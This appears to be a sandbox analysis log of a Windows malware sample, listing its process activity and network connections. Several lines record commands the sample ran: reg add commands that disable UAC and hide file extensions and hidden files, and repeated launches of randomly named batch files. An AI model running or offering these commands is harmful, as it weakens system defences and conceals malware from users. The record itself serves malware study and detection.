reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qYEMwkgM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tqskAIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\aAgIQIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RUskowsk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uCYkwgoA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ewwIoUcc.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kQAwkcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DEsYUAoA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\iCAoQIQE.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jEMEUcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\oaAYMQsk.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\eAQAkcEg.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
| GB | 172.217.169.78:80 | google.com | tcp |
| GB | 172.217.169.78:80 | google.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.78:80 | google.com | tcp |
Files